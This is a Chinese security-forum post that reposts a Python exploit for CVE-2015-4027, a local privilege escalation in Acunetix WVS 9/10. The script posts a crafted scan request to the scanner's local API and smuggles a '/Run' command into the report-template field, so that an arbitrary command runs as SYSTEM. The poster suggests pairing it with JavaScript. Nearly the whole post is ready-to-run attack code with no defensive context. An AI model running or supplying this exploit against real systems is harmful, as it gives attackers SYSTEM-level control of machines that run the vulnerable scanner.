查看: 12220|回复: 0

Acunetix WVS 9/10 本地提权漏洞

[复制链接]
  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2015-12-4 11:13:45 | 显示全部楼层 |阅读模式
    CVE: 2015-4027

    AWVS 9需要自己修改下端口。 配合JS,那就更好玩了

    [Python] 纯文本查看 复制代码
    import httplib
    import json
    from datetime import datetime
    import sys
    from time import gmtime, strftime
     
     
    COMMAND = sys.argv[1] if len(sys.argv) > 1 else "cmd.exe"
    ACUHOST = '127.0.0.1'
    ACUPORT = 8183
    ACUHEADERS = {
        "Content-Type": "application/json; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "RequestValidated": "true"
        }
    ACUEXPLOIT = "/Crawl [url]http://www.google.it[/url] /Run \""+ COMMAND + "\""
    ACUDATA = {"scanType":"scan",
               "targetList":"",
               "target":["http://"+"A"*2048],
               "recurse":"-1",
               "date":strftime("%m/%d/%Y", gmtime()),
               "dayOfWeek":"1",
               "dayOfMonth":"1",
               "time": "%s:%s" % (datetime.now().hour, datetime.now().minute+1),
               "deleteAfterCompletion":"False",
               "params":{"profile":"Default",
                         "loginSeq":"<none>",
                         "settings":"Default",
                         "scanningmode":"heuristic",
                         "excludedhours":"<none>",
                         "savetodatabase":"True",
                         "savelogs":"False",
                         "generatereport":"False",
                         "reportformat":"PDF",
                         "reporttemplate":"WVSDeveloperReport.rep " + ACUEXPLOIT,
                         "emailaddress":""}
               }
     
    def sendExploit():
        conn = httplib.HTTPConnection(ACUHOST, ACUPORT)
        conn.request("POST", "/api/addScan", json.dumps(ACUDATA), ACUHEADERS)
        resp = conn.getresponse()
        return "%s %s" % (resp.status, resp.reason)
     
    print "Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n"
    print "[+] Command : %s will be executed as SYSTEM" % COMMAND
    print "[+] Sending exploit..."
    print "[+] Result: "+sendExploit()
    print "[+] Done!"
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 09:20 , Processed in 0.019670 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部